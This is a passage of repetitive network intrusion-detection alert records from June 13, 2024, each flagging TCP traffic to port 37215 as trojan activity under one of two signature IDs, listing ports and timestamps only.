              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453554
              SID:2835222
              Source Port:35668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301877
              SID:2835222
              Source Port:59312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266025
              SID:2829579
              Source Port:41202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177191
              SID:2835222
              Source Port:55524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908240
              SID:2829579
              Source Port:59248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317599
              SID:2829579
              Source Port:59232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709485
              SID:2829579
              Source Port:33272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025207
              SID:2835222
              Source Port:40014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196832
              SID:2835222
              Source Port:56798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165367
              SID:2835222
              Source Port:39598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370885
              SID:2829579
              Source Port:38254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304174
              SID:2835222
              Source Port:34072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055420
              SID:2835222
              Source Port:40412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213849
              SID:2829579
              Source Port:55712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.693953
              SID:2835222
              Source Port:50308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870030
              SID:2829579
              Source Port:41310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087170
              SID:2829579
              Source Port:50804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754865
              SID:2835222
              Source Port:33590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130261
              SID:2829579
              Source Port:52406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043325
              SID:2835222
              Source Port:43736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805701
              SID:2835222
              Source Port:54714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127832
              SID:2829579
              Source Port:34558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088493
              SID:2829579
              Source Port:54058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318060
              SID:2835222
              Source Port:42314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990249
              SID:2835222
              Source Port:38900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633308
              SID:2835222
              Source Port:39452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264314
              SID:2829579
              Source Port:37702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042707
              SID:2829579
              Source Port:60350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156201
              SID:2829579
              Source Port:35790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098673
              SID:2835222
              Source Port:51906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658425
              SID:2829579
              Source Port:54654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824800
              SID:2835222
              Source Port:39028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.023821
              SID:2835222
              Source Port:56266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787157
              SID:2829579
              Source Port:43560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181744
              SID:2835222
              Source Port:37078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502580
              SID:2835222
              Source Port:43564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025751
              SID:2835222
              Source Port:58768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993453
              SID:2835222
              Source Port:44328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669462
              SID:2829579
              Source Port:41240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210161
              SID:2835222
              Source Port:47514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.929267
              SID:2835222
              Source Port:47424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040652
              SID:2835222
              Source Port:58956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374263
              SID:2829579
              Source Port:34812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.994019
              SID:2835222
              Source Port:44282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369403
              SID:2835222
              Source Port:51330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229637
              SID:2829579
              Source Port:53188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134569
              SID:2829579
              Source Port:37824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630027
              SID:2835222
              Source Port:39118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969968
              SID:2829579
              Source Port:40524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195531
              SID:2835222
              Source Port:41214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419891
              SID:2829579
              Source Port:47152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638155
              SID:2835222
              Source Port:60082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.054907
              SID:2835222
              Source Port:54104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675164
              SID:2829579
              Source Port:39182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726910
              SID:2835222
              Source Port:50634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273261
              SID:2829579
              Source Port:59642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638615
              SID:2829579
              Source Port:55494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994769
              SID:2835222
              Source Port:42742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757961
              SID:2835222
              Source Port:36036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167467
              SID:2829579
              Source Port:53166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524286
              SID:2835222
              Source Port:60376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417413
              SID:2829579
              Source Port:34632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977022
              SID:2829579
              Source Port:54076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804158
              SID:2829579
              Source Port:41042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633472
              SID:2835222
              Source Port:37502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321699
              SID:2829579
              Source Port:58364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871878
              SID:2835222
              Source Port:58244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508871
              SID:2829579
              Source Port:37854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013992
              SID:2835222
              Source Port:48416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992023
              SID:2835222
              Source Port:34006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524005
              SID:2829579
              Source Port:39872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824706
              SID:2835222
              Source Port:36898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636147
              SID:2835222
              Source Port:43590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193999
              SID:2829579
              Source Port:40204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569420
              SID:2829579
              Source Port:60076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.149481
              SID:2835222
              Source Port:49372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.459001
              SID:2835222
              Source Port:41100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832417
              SID:2835222
              Source Port:60100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228886
              SID:2829579
              Source Port:34516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157762
              SID:2829579
              Source Port:48320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672354
              SID:2829579
              Source Port:40696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012643
              SID:2835222
              Source Port:54526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273439
              SID:2829579
              Source Port:53358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568419
              SID:2829579
              Source Port:33722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.273417
              SID:2829579
              Source Port:54936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074400
              SID:2829579
              Source Port:38766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264947
              SID:2835222
              Source Port:48106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166197
              SID:2829579
              Source Port:44476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269090
              SID:2835222
              Source Port:56572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659752
              SID:2829579
              Source Port:40482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660797
              SID:2835222
              Source Port:42928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887955
              SID:2829579
              Source Port:33744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611114
              SID:2835222
              Source Port:35202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267397
              SID:2829579
              Source Port:51712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912888
              SID:2829579
              Source Port:60974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213226
              SID:2829579
              Source Port:46104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887648
              SID:2829579
              Source Port:41496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910148
              SID:2829579
              Source Port:51804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416757
              SID:2829579
              Source Port:49064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098064
              SID:2835222
              Source Port:52766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310142
              SID:2829579
              Source Port:46396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839628
              SID:2835222
              Source Port:38514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510209
              SID:2835222
              Source Port:33056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401051
              SID:2835222
              Source Port:60362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885479
              SID:2835222
              Source Port:36444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695630
              SID:2829579
              Source Port:52066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726990
              SID:2835222
              Source Port:52352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.453336
              SID:2829579
              Source Port:35094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271774
              SID:2829579
              Source Port:47634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804205
              SID:2835222
              Source Port:43850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676646
              SID:2829579
              Source Port:49838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547362
              SID:2829579
              Source Port:55012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303310
              SID:2829579
              Source Port:33386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711718
              SID:2835222
              Source Port:48396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042252
              SID:2835222
              Source Port:56674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222148
              SID:2829579
              Source Port:43318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612949
              SID:2829579
              Source Port:54058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936607
              SID:2835222
              Source Port:49652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457908
              SID:2829579
              Source Port:42278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177752
              SID:2829579
              Source Port:36628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526167
              SID:2829579
              Source Port:59580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726240
              SID:2835222
              Source Port:54800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954957
              SID:2829579
              Source Port:53592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869493
              SID:2835222
              Source Port:47216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087840
              SID:2829579
              Source Port:57222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835089
              SID:2829579
              Source Port:41446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422352
              SID:2829579
              Source Port:49218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697390
              SID:2829579
              Source Port:56592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213474
              SID:2829579
              Source Port:60196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194674
              SID:2835222
              Source Port:51710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013138
              SID:2835222
              Source Port:59828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568842
              SID:2835222
              Source Port:38872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573021
              SID:2829579
              Source Port:36802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993327
              SID:2835222
              Source Port:44620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480373
              SID:2829579
              Source Port:49696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403652
              SID:2835222
              Source Port:58724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247385
              SID:2835222
              Source Port:51272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678168
              SID:2829579
              Source Port:57754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274294
              SID:2829579
              Source Port:44450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090325
              SID:2835222
              Source Port:33662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321066
              SID:2835222
              Source Port:46390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152185
              SID:2829579
              Source Port:34794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214513
              SID:2835222
              Source Port:43824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193083
              SID:2829579
              Source Port:35948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824984
              SID:2835222
              Source Port:52242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157271
              SID:2829579
              Source Port:37778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438263
              SID:2835222
              Source Port:50098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942082
              SID:2835222
              Source Port:43838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357793
              SID:2829579
              Source Port:54474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228585
              SID:2835222
              Source Port:40138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300223
              SID:2829579
              Source Port:33494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786467
              SID:2835222
              Source Port:58978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091847
              SID:2829579
              Source Port:41152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.788582
              SID:2835222
              Source Port:39084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669371
              SID:2829579
              Source Port:47694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731776
              SID:2829579
              Source Port:59202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524433
              SID:2829579
              Source Port:37160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868500
              SID:2835222
              Source Port:60348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884499
              SID:2835222
              Source Port:33558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671762
              SID:2835222
              Source Port:50962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729661
              SID:2835222
              Source Port:55484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660457
              SID:2835222
              Source Port:37724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839664
              SID:2829579
              Source Port:56842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524846
              SID:2829579
              Source Port:48780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455834
              SID:2835222
              Source Port:48332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155567
              SID:2835222
              Source Port:35188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756285
              SID:2835222
              Source Port:58862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912528
              SID:2835222
              Source Port:39202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629490
              SID:2835222
              Source Port:48976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975308
              SID:2835222
              Source Port:55580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821177
              SID:2835222
              Source Port:58056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839436
              SID:2835222
              Source Port:53982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345559
              SID:2835222
              Source Port:48292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.955000
              SID:2829579
              Source Port:34146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.155163
              SID:2829579
              Source Port:45860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543856
              SID:2829579
              Source Port:37780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349538
              SID:2835222
              Source Port:47340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508412
              SID:2829579
              Source Port:57640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090542
              SID:2829579
              Source Port:43360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941159
              SID:2835222
              Source Port:45804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356840
              SID:2829579
              Source Port:38624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241440
              SID:2829579
              Source Port:51868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725420
              SID:2835222
              Source Port:46694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836894
              SID:2829579
              Source Port:41066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231828
              SID:2835222
              Source Port:36838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.179024
              SID:2835222
              Source Port:36262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248085
              SID:2835222
              Source Port:44922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783811
              SID:2835222
              Source Port:54060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613431
              SID:2835222
              Source Port:52942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350465
              SID:2835222
              Source Port:52378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710502
              SID:2829579
              Source Port:33164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839383
              SID:2829579
              Source Port:57612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565517
              SID:2829579
              Source Port:57396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102059
              SID:2835222
              Source Port:48286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191715
              SID:2835222
              Source Port:45370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306398
              SID:2835222
              Source Port:42144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231944
              SID:2835222
              Source Port:51920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
